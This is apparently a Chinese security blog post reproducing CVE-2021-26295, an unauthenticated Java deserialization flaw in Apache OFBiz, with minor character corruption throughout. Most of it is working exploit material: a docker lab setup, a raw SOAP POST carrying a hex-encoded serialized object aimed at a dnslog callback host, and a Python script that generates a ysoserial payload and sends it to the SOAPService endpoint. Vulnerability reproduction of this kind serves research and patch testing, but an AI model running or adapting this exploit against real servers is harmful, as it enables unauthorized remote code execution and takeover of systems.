Apache OFBiz rmi反序列化(CVE-2021-26295)復(fù)現(xiàn)

一、漏洞描述

Apache OFBiz存在RMI反序列化前臺命令執(zhí)行，未經(jīng)身份驗證攻擊者可構(gòu)造惡意請求，觸發(fā)反序列化，從而造成任意代碼執(zhí)行，控制服務(wù)器。

二茎芋、影響范圍

Apache OFBiz：<17.12.06

三、環(huán)境搭建&漏洞復(fù)現(xiàn)

docker run -d -p 8000:8080 -p 8443:8443 opensourceknight/ofbiz

拉取鏡像

漏洞復(fù)現(xiàn)：

encode腳本：

import binascii

filename = 'thelostworld.ot'

with open(filename, 'rb') as f:

? content = f.read()

print(binascii.hexlify(content))

POC：

POST /webtools/control/SOAPService HTTP/1.1

Host: 192.168.0.115:8443

Content-Type: application/xml

Content-Length: 831

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

? ? <soapenv:Header/>

? ? <soapenv:Body>

? ? <ser>

? ? <map-HashMap>

? ? ? ? <map-Entry>

? ? ? ? ? ? <map-Key>

? ? ? ? ? ? ? ? <cus-obj>aced00057372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00014c0004686f737471007e00014c000870726f746f636f6c71007e00014c000372656671007e00017870ffffffffffffffff7400177478663737372e7234343976762e646e736c6f672e636e74000071007e0003740004687474707078</cus-obj>

? ? ? ? ? ? </map-Key>

? ? ? ? ? ? <map-Value>

? ? ? ? ? ? ? ? <std-String value="http://noxj3z.dnslog.cn"/>

? ? ? ? ? ? </map-Value>

? ? ? ? </map-Entry>

? ? </map-HashMap>

? ? </ser>

? ? </soapenv:Body>

? ? </soapenv:Envelope>

python3 OFBizPoc.py "https://192.168.0.115:8443/" "http://68zfh0.dnslog.cn"

腳本：Powered by 0x141 Team ShimizuKawasaki

import requests

import sys

import subprocess

from urllib3.exceptions import InsecureRequestWarning

def trans(s):

? ? return "%s" % ''.join('%.2x' % x for x in s)

if __name__ == '__main__':

? print('''

=========================================

? ____? ______ ____? _? ? ? _____? ____? _____

/ __ \|? ____|? _ \(_)? ? |? __ \ / __ \ / ____|

| |? | | |__? | |_) |_ ____ | |__) | |? | | |? ?

| |? | |? __| |? _ <| |_? / |? ___/| |? | | |? ?

| |__| | |? ? | |_) | |/ /? | |? ? | |__| | |____

\____/|_|? ? |____/|_/___| |_|? ? \____/ \_____|

? ? Powered by 0x141 Team ShimizuKawasaki

=========================================

? ? '''

)

? host = sys.argv[1]

? comForKey = sys.argv[2]

? popen = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", comForKey], stdout=subprocess.PIPE)

? data = popen.stdout.read()

? if len(data) == 0:

? ? print("請在當前腳本目錄放置ysoserial.jar!")

? else :

? ? hex_data = trans(data)

? ? headers = {'Content-Type': 'text/xml'}

? ? post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/"><ns1:cus-obj>%s</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data

? ? requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

? ? res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False)

? ? if? res.status_code == 200 :

? ? ? print("已經(jīng)測試完成,請檢查你的dnslog: " + comForKey)

參考：

https://mp.weixin.qq.com/s/s2glEvy-jrD1CDzuOCGbbg

https://mp.weixin.qq.com/s/XT2P6vB8e2pDp3_Dulfzhw

免責聲明：本站提供安全工具蜈出、程序(方法)可能帶有攻擊性败徊，僅供安全研究與教學(xué)之用，風(fēng)險自負!

轉(zhuǎn)載聲明：著作權(quán)歸作者所有掏缎。商業(yè)轉(zhuǎn)載請聯(lián)系作者獲得授權(quán)皱蹦，非商業(yè)轉(zhuǎn)載請注明出處。

訂閱查看更多復(fù)現(xiàn)文章眷蜈、學(xué)習(xí)筆記

thelostworld

安全路上沪哺，與你并肩前行！Ｗ萌濉９技恕！

歡迎添加本公眾號作者微信交流忌怎，添加時備注一下“公眾號”